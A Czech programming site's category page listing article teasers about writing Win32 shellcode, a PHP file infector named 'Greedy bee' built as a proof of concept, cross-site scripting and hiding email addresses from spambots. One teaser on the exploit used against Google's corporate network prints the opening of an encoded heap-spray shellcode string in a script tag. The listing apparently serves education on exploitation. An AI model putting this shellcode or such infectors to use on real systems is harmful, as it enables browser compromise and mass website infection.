Programming

Články věnované programovacím jazykům

Nebojme se shellcodů IV

Tímto dílem začíná seriál popisovat pokročilejší techniky. Tento čtenáře provede návrhem a tvorbou generátoru statického enkodéru shellcodů.

"Greedy bee" – Jednoduchý infektor PHP souborů

"Greedy bee" je jednoduchý infektor PHP skritů, vytvořený v PHP. Vznikl jako PoC pro pár lidí, které zajímalo, jakým způsobem se masově infikují webové stránky na hostinzích.

Link:

Třetí díl seriálu o shellcodech je venku

Již není mnoho základních věcí, které by měl začínající tvůrce shellcodů znát. V poslední dílu z minisérie pro začátečníky si ukážeme, jakým způsobem pracovat s funkcemi z externích DLL knihoven. Praktickou ukázkou je pak tvorba shellcodu, který využívá API funkci MessageBox z DLL knihovny user32.dll. Opět nebude chybět nezbytná teorie :)

Seriál o shellcodech pokračuje druhým dílem

V druhém dílu seriálu se čtenáři dovědí několik teoretických věcí, jež se při práci s shellcody hodí znát, a zjistí, jak využívat textové řetězce. Výsledkem jsou pak téměř identické shellcody, využívající rozdílné techniky práce s řetězci, které spouští Příkazový řádek (Command Line).

Seriál Nebojme se shellcodů

(Snad nejen) První díl seriálu s názvem "Nebojme se shellcodů" by měl čtenáře provést a zasvětit do tajů tvorby shellcodů pro platformu Win32 NT na procesorech rodiny x86. V prvním díle se čtenář dozví něco málo o historii, zjistí, co vlastně shellcode je, a na závěr si jeden ukázkový vytvoří.

Exploit použitý k útoku na korporátní síť Googlu

UPDATE

<html><script>
var sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805

XSS (Cross-Site Scripting) hacking

Cílem tohoto dokumentu (whitepaperu) je seznámit uživatele s technikou zvanou Cross-Site Scripting.

Jak skrýt emailovou adresu před spammery?

Ukážeme si zde většinu metod jak lze skrýt na webových stránkách přítomnost emailové adresy před spamboty (email harvestery), kteří automatizovaně přidávají adresy na seznamy spammerů.

Syndikovat obsah